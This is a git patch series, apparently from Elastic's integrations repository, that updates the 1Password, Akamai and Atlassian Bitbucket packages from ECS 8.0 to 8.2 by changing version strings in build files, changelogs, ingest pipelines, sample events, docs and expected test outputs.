From 43d80af27c521246b31ad95b14e2f9e98c6cc78d Mon Sep 17 00:00:00 2001
From: Taylor Swanson
Date: Tue, 22 Feb 2022 11:54:44 -0600
Subject: [PATCH 01/23] Update 1password to ECS 8.2

---
 packages/1password/_dev/build/build.yml | 2 +-
 packages/1password/changelog.yml | 5 +++++
 .../_dev/test/pipeline/test-itemusages.json-expected.json | 4 ++--
 .../item_usages/elasticsearch/ingest_pipeline/default.yml | 2 +-
 packages/1password/data_stream/item_usages/sample_event.json | 2 +-
 .../test/pipeline/test-signinattempts.json-expected.json | 4 ++--
 .../elasticsearch/ingest_pipeline/default.yml | 2 +-
 .../1password/data_stream/signin_attempts/sample_event.json | 2 +-
 packages/1password/docs/README.md | 4 ++--
 packages/1password/manifest.yml | 2 +-
 10 files changed, 17 insertions(+), 12 deletions(-)

diff --git a/packages/1password/_dev/build/build.yml b/packages/1password/_dev/build/build.yml
index 809e76063e9..d61527283ec 100644
--- a/packages/1password/_dev/build/build.yml
+++ b/packages/1password/_dev/build/build.yml
@@ -1,3 +1,3 @@
 dependencies:
 ecs:
- reference: git@8.0
+ reference: git@8.2
diff --git a/packages/1password/changelog.yml b/packages/1password/changelog.yml
index 923fff697f3..2592c7be889 100644
--- a/packages/1password/changelog.yml
+++ b/packages/1password/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.2.0"
+ changes:
+ - description: Update to ECS 8.2
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/xxxx
 - version: "1.1.1"
 changes:
 - description: Fix field mapping conflict for ECS `event.created`.
diff --git a/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json-expected.json b/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json-expected.json
index df1f1d08add..cc7ee2c34fa 100644
--- a/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json-expected.json
+++ b/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json-expected.json
@@ -3,7 +3,7 @@
 {
 "@timestamp": "2021-08-30T18:57:42.484Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "category": [
@@ -75,7 +75,7 @@
 {
 "@timestamp": "2021-08-30T19:10:00.123Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "category": [
diff --git a/packages/1password/data_stream/item_usages/elasticsearch/ingest_pipeline/default.yml b/packages/1password/data_stream/item_usages/elasticsearch/ingest_pipeline/default.yml
index f3553c2dcea..addd69c6986 100644
--- a/packages/1password/data_stream/item_usages/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/1password/data_stream/item_usages/elasticsearch/ingest_pipeline/default.yml
@@ -16,7 +16,7 @@ processors:
 #######################
 - set:
 field: ecs.version
- value: '8.0.0'
+ value: '8.2.0'
 # Sets event.created from the @timestamp field generated by filebeat before being overwritten further down
 - set:
 field: event.created
diff --git a/packages/1password/data_stream/item_usages/sample_event.json b/packages/1password/data_stream/item_usages/sample_event.json
index cb199f45f59..a646166ad03 100644
--- a/packages/1password/data_stream/item_usages/sample_event.json
+++ b/packages/1password/data_stream/item_usages/sample_event.json
@@ -13,7 +13,7 @@
 "type": "logs"
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "elastic_agent": {
 "id": "82d0dfd8-3946-4ac0-a092-a9146a71e3f7",
diff --git a/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json-expected.json b/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json-expected.json
index 98bfb72fb9e..1fe419bb431 100644
--- a/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json-expected.json
+++ b/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json-expected.json
@@ -3,7 +3,7 @@
 {
 "@timestamp": "2021-08-11T14:28:03.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "success",
@@ -78,7 +78,7 @@
 {
 "@timestamp": "2021-08-11T15:04:22.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "credentials_failed",
diff --git a/packages/1password/data_stream/signin_attempts/elasticsearch/ingest_pipeline/default.yml b/packages/1password/data_stream/signin_attempts/elasticsearch/ingest_pipeline/default.yml
index a5160bf018a..b0a78ca514d 100644
--- a/packages/1password/data_stream/signin_attempts/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/1password/data_stream/signin_attempts/elasticsearch/ingest_pipeline/default.yml
@@ -16,7 +16,7 @@ processors:
 #######################
 - set:
 field: ecs.version
- value: '8.0.0'
+ value: '8.2.0'
 # Sets event.created from the @timestamp field generated by filebeat before being overwritten further down
 - set:
 field: event.created
diff --git a/packages/1password/data_stream/signin_attempts/sample_event.json b/packages/1password/data_stream/signin_attempts/sample_event.json
index 43821c1e5bb..7d1d557041d 100644
--- a/packages/1password/data_stream/signin_attempts/sample_event.json
+++ b/packages/1password/data_stream/signin_attempts/sample_event.json
@@ -13,7 +13,7 @@
 "type": "logs"
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "elastic_agent": {
 "id": "82d0dfd8-3946-4ac0-a092-a9146a71e3f7",
diff --git a/packages/1password/docs/README.md b/packages/1password/docs/README.md
index 8b3c7b9ec56..4d2e545df74 100644
--- a/packages/1password/docs/README.md
+++ b/packages/1password/docs/README.md
@@ -84,7 +84,7 @@ An example event for `item_usages` looks as following:
 "type": "logs"
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "elastic_agent": {
 "id": "82d0dfd8-3946-4ac0-a092-a9146a71e3f7",
@@ -222,7 +222,7 @@ An example event for `signin_attempts` looks as following:
 "type": "logs"
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "elastic_agent": {
 "id": "82d0dfd8-3946-4ac0-a092-a9146a71e3f7",
diff --git a/packages/1password/manifest.yml b/packages/1password/manifest.yml
index 32d1a26fa10..2bc2b3e8bbd 100644
--- a/packages/1password/manifest.yml
+++ b/packages/1password/manifest.yml
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: 1password
 title: "1Password Events Reporting"
-version: 1.1.1
+version: 1.2.0
 license: basic
 description: Collect events from 1Password Events API with Elastic Agent.
 type: integration

From acecb9a1f404c6ea4d3e686215a881e5174bcba6 Mon Sep 17 00:00:00 2001
From: Taylor Swanson
Date: Tue, 22 Feb 2022 12:05:12 -0600
Subject: [PATCH 02/23] Update akamai to ECS 8.2

---
 packages/akamai/_dev/build/build.yml | 2 +-
 packages/akamai/changelog.yml | 5 +++++
 .../siem/_dev/test/pipeline/test-http-json.log-expected.json | 4 ++--
 .../siem/elasticsearch/ingest_pipeline/default.yml | 2 +-
 packages/akamai/data_stream/siem/sample_event.json | 2 +-
 packages/akamai/docs/README.md | 2 +-
 packages/akamai/manifest.yml | 2 +-
 7 files changed, 12 insertions(+), 7 deletions(-)

diff --git a/packages/akamai/_dev/build/build.yml b/packages/akamai/_dev/build/build.yml
index 809e76063e9..d61527283ec 100644
--- a/packages/akamai/_dev/build/build.yml
+++ b/packages/akamai/_dev/build/build.yml
@@ -1,3 +1,3 @@
 dependencies:
 ecs:
- reference: git@8.0
+ reference: git@8.2
diff --git a/packages/akamai/changelog.yml b/packages/akamai/changelog.yml
index 1277fe8aa53..0b8b4c9780c 100644
--- a/packages/akamai/changelog.yml
+++ b/packages/akamai/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "0.1.2"
+ changes:
+ - description: Update to ECS 8.2
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/xxxx
 - version: "0.1.1"
 changes:
 - description: Update to ECS 8.0
diff --git a/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json b/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json
index fbdba4579c6..4f30451505a 100644
--- a/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json
+++ b/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json
@@ -117,7 +117,7 @@
 },
 "@timestamp": "2017-04-04T10:57:02.000Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "ip": [
@@ -273,7 +273,7 @@
 },
 "@timestamp": "2016-08-11T13:45:33.026Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "ip": [
diff --git a/packages/akamai/data_stream/siem/elasticsearch/ingest_pipeline/default.yml b/packages/akamai/data_stream/siem/elasticsearch/ingest_pipeline/default.yml
index 734700a2fb8..8ad2b9f08da 100644
--- a/packages/akamai/data_stream/siem/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/akamai/data_stream/siem/elasticsearch/ingest_pipeline/default.yml
@@ -6,7 +6,7 @@ processors:
 value: '{{_ingest.timestamp}}'
 - set:
 field: ecs.version
- value: '8.0.0'
+ value: '8.2.0'
 - rename:
 field: message
 target_field: event.original
diff --git a/packages/akamai/data_stream/siem/sample_event.json b/packages/akamai/data_stream/siem/sample_event.json
index ce2935b782a..3a25038b372 100644
--- a/packages/akamai/data_stream/siem/sample_event.json
+++ b/packages/akamai/data_stream/siem/sample_event.json
@@ -99,7 +99,7 @@
 "type": "logs"
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "elastic_agent": {
 "id": "82d0dfd8-3946-4ac0-a092-a9146a71e3f7",
diff --git a/packages/akamai/docs/README.md b/packages/akamai/docs/README.md
index d7c13f310aa..be76c61cc78 100644
--- a/packages/akamai/docs/README.md
+++ b/packages/akamai/docs/README.md
@@ -232,7 +232,7 @@ An example event for `siem` looks as following:
 "type": "logs"
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "elastic_agent": {
 "id": "82d0dfd8-3946-4ac0-a092-a9146a71e3f7",
diff --git a/packages/akamai/manifest.yml b/packages/akamai/manifest.yml
index 41766a14e08..f22f5542838 100644
--- a/packages/akamai/manifest.yml
+++ b/packages/akamai/manifest.yml
@@ -1,6 +1,6 @@
 name: akamai
 title: Akamai
-version: 0.1.1
+version: 0.1.2
 release: beta
 description: Akamai Integration
 type: integration

From 7016b47cab94d5deaa5667e636300f406bef5453 Mon Sep 17 00:00:00 2001
From: Taylor Swanson
Date: Tue, 22 Feb 2022 12:11:48 -0600
Subject: [PATCH 03/23] Update atlassian_bitbucket to ECS 8.2

---
 .../atlassian_bitbucket/_dev/build/build.yml | 2 +-
 packages/atlassian_bitbucket/changelog.yml | 5 +
 .../pipeline/test-audit-api.log-expected.json | 354 +++++++++---------
 .../test-audit-files.log-expected.json | 204 +++++-----
 .../elasticsearch/ingest_pipeline/default.yml | 2 +-
 .../data_stream/audit/sample_event.json | 2 +-
 packages/atlassian_bitbucket/docs/README.md | 2 +-
 packages/atlassian_bitbucket/manifest.yml | 2 +-
 8 files changed, 289 insertions(+), 284 deletions(-)

diff --git a/packages/atlassian_bitbucket/_dev/build/build.yml b/packages/atlassian_bitbucket/_dev/build/build.yml
index 809e76063e9..d61527283ec 100644
--- a/packages/atlassian_bitbucket/_dev/build/build.yml
+++ b/packages/atlassian_bitbucket/_dev/build/build.yml
@@ -1,3 +1,3 @@
 dependencies:
 ecs:
- reference: git@8.0
+ reference: git@8.2
diff --git a/packages/atlassian_bitbucket/changelog.yml b/packages/atlassian_bitbucket/changelog.yml
index 9fb3befa684..9b97737b763 100644
--- a/packages/atlassian_bitbucket/changelog.yml
+++ b/packages/atlassian_bitbucket/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.2.0"
+ changes:
+ - description: Update to ECS 8.2
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/xxxx
 - version: "1.1.0"
 changes:
 - description: Update to ECS 8.0
diff --git a/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json b/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json
index 6a32e0b2b9a..2d3d373833d 100644
--- a/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json
+++ b/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json
@@ -3,7 +3,7 @@
 {
 "@timestamp": "2021-11-27T17:38:58.087Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -75,7 +75,7 @@
 {
 "@timestamp": "2021-11-27T17:38:53.360Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -166,7 +166,7 @@
 {
 "@timestamp": "2021-11-27T17:38:42.151Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -241,7 +241,7 @@
 {
 "@timestamp": "2021-11-27T17:38:29.423Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -315,7 +315,7 @@
 {
 "@timestamp": "2021-11-27T17:38:23.209Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -409,7 +409,7 @@
 {
 "@timestamp": "2021-11-27T17:38:16.687Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -503,7 +503,7 @@
 {
 "@timestamp": "2021-11-27T17:38:04.808Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -577,7 +577,7 @@
 {
 "@timestamp": "2021-11-27T17:36:40.692Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -671,7 +671,7 @@
 {
 "@timestamp": "2021-11-27T17:36:40.674Z",
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "related": {
 "user": [
@@ -745,7 +745,7 @@ { "@timestamp": "2021-11-27T17:36:19.269Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -815,7 +815,7 @@ { "@timestamp": "2021-11-27T17:36:18.873Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -885,7 +885,7 @@ { "@timestamp": "2021-11-27T17:36:18.370Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -947,7 +947,7 @@ { "@timestamp": "2021-11-27T17:36:17.994Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1010,7 +1010,7 @@ { "@timestamp": "2021-11-27T17:36:17.994Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1073,7 +1073,7 @@ { "@timestamp": "2021-11-27T17:36:17.994Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1136,7 +1136,7 @@ { "@timestamp": "2021-11-27T17:36:17.994Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1199,7 +1199,7 @@ { "@timestamp": "2021-11-27T17:36:17.994Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1262,7 +1262,7 @@ { "@timestamp": "2021-11-27T17:36:17.993Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1325,7 +1325,7 @@ { "@timestamp": "2021-11-27T17:36:17.991Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1388,7 +1388,7 @@ { "@timestamp": "2021-11-27T17:35:46.331Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1458,7 +1458,7 @@ { "@timestamp": "2021-11-27T17:35:45.810Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1528,7 +1528,7 @@ { "@timestamp": "2021-11-27T17:35:33.093Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1598,7 +1598,7 @@ { "@timestamp": "2021-11-27T17:35:31.362Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -1668,7 +1668,7 @@ { "@timestamp": "2021-11-27T17:35:11.898Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1729,7 +1729,7 @@ { "@timestamp": "2021-11-27T17:34:26.112Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1790,7 +1790,7 @@ { "@timestamp": "2021-11-27T17:34:26.108Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1864,7 +1864,7 @@ { "@timestamp": "2021-11-27T17:34:26.019Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1938,7 +1938,7 @@ { "@timestamp": "2021-11-27T17:34:25.313Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2033,7 +2033,7 @@ { "@timestamp": "2021-11-27T17:34:24.078Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2108,7 +2108,7 @@ { "@timestamp": "2021-11-27T17:31:41.984Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2164,7 +2164,7 @@ { "@timestamp": "2021-11-27T17:31:41.375Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2232,7 +2232,7 @@ { "@timestamp": "2021-11-27T17:29:52.694Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2286,7 +2286,7 @@ { "@timestamp": "2021-11-27T17:29:52.688Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2340,7 +2340,7 @@ { "@timestamp": "2021-11-27T17:29:52.681Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2394,7 +2394,7 @@ { "@timestamp": "2021-11-27T17:29:52.674Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2448,7 +2448,7 @@ { "@timestamp": "2021-11-27T17:29:52.672Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -2502,7 +2502,7 @@ { "@timestamp": "2021-11-27T17:29:52.560Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2556,7 +2556,7 @@ { "@timestamp": "2021-11-27T17:29:52.557Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2610,7 +2610,7 @@ { "@timestamp": "2021-11-27T17:29:52.502Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2664,7 +2664,7 @@ { "@timestamp": "2021-11-27T17:29:52.491Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2718,7 +2718,7 @@ { "@timestamp": "2021-11-27T17:29:52.477Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2772,7 +2772,7 @@ { "@timestamp": "2021-11-27T17:29:52.472Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2826,7 +2826,7 @@ { "@timestamp": "2021-11-27T17:29:52.450Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2880,7 +2880,7 @@ { "@timestamp": "2021-11-27T17:29:52.439Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2934,7 +2934,7 @@ { "@timestamp": "2021-11-27T17:29:52.216Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2988,7 +2988,7 @@ { "@timestamp": "2021-11-27T17:29:52.214Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3042,7 +3042,7 @@ { "@timestamp": "2021-11-27T17:29:52.212Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3096,7 +3096,7 @@ { "@timestamp": "2021-11-27T17:29:52.203Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3150,7 +3150,7 @@ { "@timestamp": "2021-11-27T17:29:52.201Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -3204,7 +3204,7 @@ { "@timestamp": "2021-11-27T17:29:51.049Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3258,7 +3258,7 @@ { "@timestamp": "2021-11-27T17:29:51.037Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3312,7 +3312,7 @@ { "@timestamp": "2021-11-27T17:29:51.022Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3366,7 +3366,7 @@ { "@timestamp": "2021-11-27T17:29:51.005Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3420,7 +3420,7 @@ { "@timestamp": "2021-11-27T17:29:51.001Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3474,7 +3474,7 @@ { "@timestamp": "2021-11-27T17:29:50.889Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3528,7 +3528,7 @@ { "@timestamp": "2021-11-27T17:29:50.887Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3582,7 +3582,7 @@ { "@timestamp": "2021-11-27T17:29:50.863Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3636,7 +3636,7 @@ { "@timestamp": "2021-11-27T17:29:50.862Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3690,7 +3690,7 @@ { "@timestamp": "2021-11-27T17:29:50.861Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3744,7 +3744,7 @@ { "@timestamp": "2021-11-27T17:29:50.849Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3798,7 +3798,7 @@ { "@timestamp": "2021-11-27T17:29:50.846Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3852,7 +3852,7 @@ { "@timestamp": "2021-11-27T17:29:50.845Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -3906,7 +3906,7 @@ { "@timestamp": "2021-11-27T17:29:50.824Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3960,7 +3960,7 @@ { "@timestamp": "2021-11-27T17:29:50.801Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4014,7 +4014,7 @@ { "@timestamp": "2021-11-27T17:29:50.718Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4068,7 +4068,7 @@ { "@timestamp": "2021-11-27T17:29:50.698Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4122,7 +4122,7 @@ { "@timestamp": "2021-11-27T17:29:50.697Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4176,7 +4176,7 @@ { "@timestamp": "2021-11-27T17:29:50.634Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4230,7 +4230,7 @@ { "@timestamp": "2021-11-27T17:29:49.656Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4284,7 +4284,7 @@ { "@timestamp": "2021-11-27T17:29:49.399Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4338,7 +4338,7 @@ { "@timestamp": "2021-11-27T17:29:49.394Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4392,7 +4392,7 @@ { "@timestamp": "2021-11-27T17:29:48.385Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4446,7 +4446,7 @@ { "@timestamp": "2021-11-27T17:29:48.370Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4500,7 +4500,7 @@ { "@timestamp": "2021-11-27T17:29:48.363Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4554,7 +4554,7 @@ { "@timestamp": "2021-11-27T17:29:32.073Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -4608,7 +4608,7 @@ { "@timestamp": "2021-11-27T17:29:32.072Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4662,7 +4662,7 @@ { "@timestamp": "2021-11-27T17:29:32.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4716,7 +4716,7 @@ { "@timestamp": "2021-11-27T17:29:31.999Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4770,7 +4770,7 @@ { "@timestamp": "2021-11-27T17:29:31.988Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4824,7 +4824,7 @@ { "@timestamp": "2021-11-27T17:29:31.723Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4878,7 +4878,7 @@ { "@timestamp": "2021-11-27T17:29:24.643Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4932,7 +4932,7 @@ { "@timestamp": "2021-11-27T17:29:24.638Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4986,7 +4986,7 @@ { "@timestamp": "2021-11-27T17:29:23.479Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5040,7 +5040,7 @@ { "@timestamp": "2021-11-27T17:29:23.434Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5094,7 +5094,7 @@ { "@timestamp": "2021-11-27T17:29:23.432Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5148,7 +5148,7 @@ { "@timestamp": "2021-11-27T17:29:23.422Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5202,7 +5202,7 @@ { "@timestamp": "2021-11-27T17:29:23.406Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5256,7 +5256,7 @@ { "@timestamp": "2021-11-27T17:29:23.343Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
@@ -5310,7 +5310,7 @@ { "@timestamp": "2021-11-27T17:29:23.039Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5364,7 +5364,7 @@ { "@timestamp": "2021-11-27T17:29:22.847Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5418,7 +5418,7 @@ { "@timestamp": "2021-11-27T17:29:22.726Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5472,7 +5472,7 @@ { "@timestamp": "2021-11-27T17:29:22.723Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5526,7 +5526,7 @@ { "@timestamp": "2021-11-27T17:29:22.706Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5580,7 +5580,7 @@ { "@timestamp": "2021-11-27T17:29:22.681Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5634,7 +5634,7 @@ { "@timestamp": "2021-11-27T17:29:22.680Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5688,7 +5688,7 @@ { "@timestamp": "2021-11-27T17:29:21.575Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5742,7 +5742,7 @@ { "@timestamp": "2021-11-27T17:29:21.522Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5796,7 +5796,7 @@ { "@timestamp": "2021-11-27T17:29:21.519Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5850,7 +5850,7 @@ { "@timestamp": "2021-11-27T17:29:21.497Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5904,7 +5904,7 @@ { "@timestamp": "2021-11-27T17:29:21.330Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5958,7 +5958,7 @@ { "@timestamp": "2021-11-27T17:29:20.129Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ 
